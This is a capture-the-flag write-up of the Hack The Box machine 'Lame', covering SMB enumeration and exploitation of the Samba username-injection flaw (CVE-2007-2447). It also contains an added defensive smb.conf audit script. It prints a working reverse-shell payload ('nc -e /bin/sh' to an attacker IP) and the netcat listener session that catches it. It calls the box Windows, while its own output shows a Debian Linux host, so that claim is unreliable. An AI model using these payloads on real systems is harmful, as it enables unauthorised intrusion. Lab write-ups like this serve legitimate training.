HTB - Lame
I’ve just completed Lame from HTB! In my opinion, Lame is an easy box that provides a quick introduction to the Windows Operating System. Here is a quick writeup about how I solved this box.
Box : Lame
IP Address : 10.10.10.3
Operating System : Windows
Remarks
- While doing this box, I failed to realize that Samba has actually turned off SMBv1 support. Hence, I was met with a lot of connection errors when I attempted to pwn the box (and a lot of hair-tearing sessions!!)
Enumeration
As with any other box, let's do a quick Nmap scan to identify the open ports. This box has slightly more open ports than usual, 5 in fact, namely ports 21, 22, 139, 445 and 3632.
Port 21 belongs to an FTP server, port 22 to an SSH server and port 3632 to a distccd server, while ports 139 and 445 belong to a netbios-ssn service. Both ports 139 and 445 use Samba, but the main difference is the version of Samba used.
Firstly, we run searchsploit for existing vulnerabilities in the service on port 21, and we discover that vsftpd 2.3.4, which is running on port 21, may be vulnerable to backdoor command execution.
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remot | linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote D | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote D | windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/17491.rb
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------- ---------------------------------
To verify this, we will scan for the vulnerability using Nmap. Sadly, this port doesn’t seem to be vulnerable to such a backdoor exploitation.
Exploitation
Noticing that ports 139 and 445 use Samba, and knowing that Samba is an implementation of the SMB networking protocol, we will now try to connect to the SMB server using the SMBv1 protocol, the reason being that SMBv1 has more vulnerabilities and attack vectors for us to try. One thing to note though is that Samba has actually turned off its SMBv1 support, so we have to supply the client min protocol=NT1 option for it to work. At the same time, we also realize that we can log in to the server anonymously.
┌──(kali㉿kali)-[~]
└─$ smbclient -L 10.10.10.3 --option='client min protocol=NT1'
Enter WORKGROUP\kali's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
Knowing that we can log in to the Samba server without any credentials, we also found an exploit for CVE-2007-2447 on Exploit-DB that allows shell metacharacters injected through the username parameter to run commands on the SMB server. This could then be used to create a reverse shell to the attacker's machine.
To do so, we will first have to create a listener on the attacker's machine:
nc -nlvp 3000
Afterwards, all we have to do is connect to the share with smbclient and send the metacharacters in the username together with the reverse shell payload:
┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.10.3/tmp
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.16.250 3000`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \>
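As a defensive counterpart to the injection above, here is an added Python example (not code from the original writeup) that audits an smb.conf for the settings this box turns on: the username map script that CVE-2007-2447 abused, a minimum protocol that still admits SMBv1/NT1 clients, and anonymous or guest access; it also flags session-setup user names that carry shell metacharacters like the logon payload shown. The smb.conf fragment and the script path in it are constructed for the example.

```python
import configparser
import re

# Constructed smb.conf fragment for demonstration (not taken from the box).
SAMPLE_SMB_CONF = """[global]
   workgroup = WORKGROUP
   server string = lame server
   username map script = /etc/samba/scripts/mapusers.sh
   map to guest = bad user

[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
"""

# Samba dialects older than SMB2; NT1 is the one smbclient had to request above.
SMB1_DIALECTS = {"CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1"}

# Backticks, $( ) and pipe/redirect/separator characters never belong in a user
# name; a lone trailing '$' is allowed because machine accounts end with one.
METACHARS = re.compile(r"`|\$\(|[;|&<>]")


def audit_smb_conf(text):
    """Return one finding string per risky setting in an smb.conf."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    cfg.read_string(text)
    g = cfg["global"] if cfg.has_section("global") else {}
    findings = []
    # CVE-2007-2447: Samba 3.0.0 to 3.0.25rc3 passed the unsanitised user
    # name to this script via the shell, so its presence deserves review.
    if "username map script" in g:
        findings.append("username map script = " + g["username map script"])
    # No minimum, or an SMBv1-era minimum, means NT1 clients are accepted.
    min_proto = g.get("server min protocol", "").upper()
    if not min_proto or min_proto in SMB1_DIALECTS:
        findings.append("server min protocol allows SMBv1 (value: %r)" % min_proto)
    # Anything but 'never' (the default) turns failed logins into guest sessions.
    if g.get("map to guest", "never").lower() != "never":
        findings.append("map to guest = " + g["map to guest"])
    for share in cfg.sections():
        if share != "global" and cfg[share].getboolean("guest ok", fallback=False):
            findings.append("share [%s] allows guest access" % share)
    return findings


def suspicious_username(name):
    """True if a session-setup user name carries shell metacharacters."""
    return METACHARS.search(name) is not None
```

Running `audit_smb_conf(SAMPLE_SMB_CONF)` yields four findings; a config with `server min protocol = SMB2_02`, `map to guest = never` and no `guest ok` shares yields none.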
Obtaining the system flag
Afterwards a connection will be received on the attacker's machine. All that is left to do is to stabilize the shell and obtain the system flag.
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nlvp 3000
listening on [any] 3000 ...
connect to [10.10.16.250] from (UNKNOWN) [10.10.10.3] 49928
python -c 'import pty; pty.spawn("bash")'
root@lame:/# cd /root
cd /root
root@lame:/root# ls
ls
Desktop reset_logs.sh root.txt vnc.log
root@lame:/root# cat root.txt
cat root.txt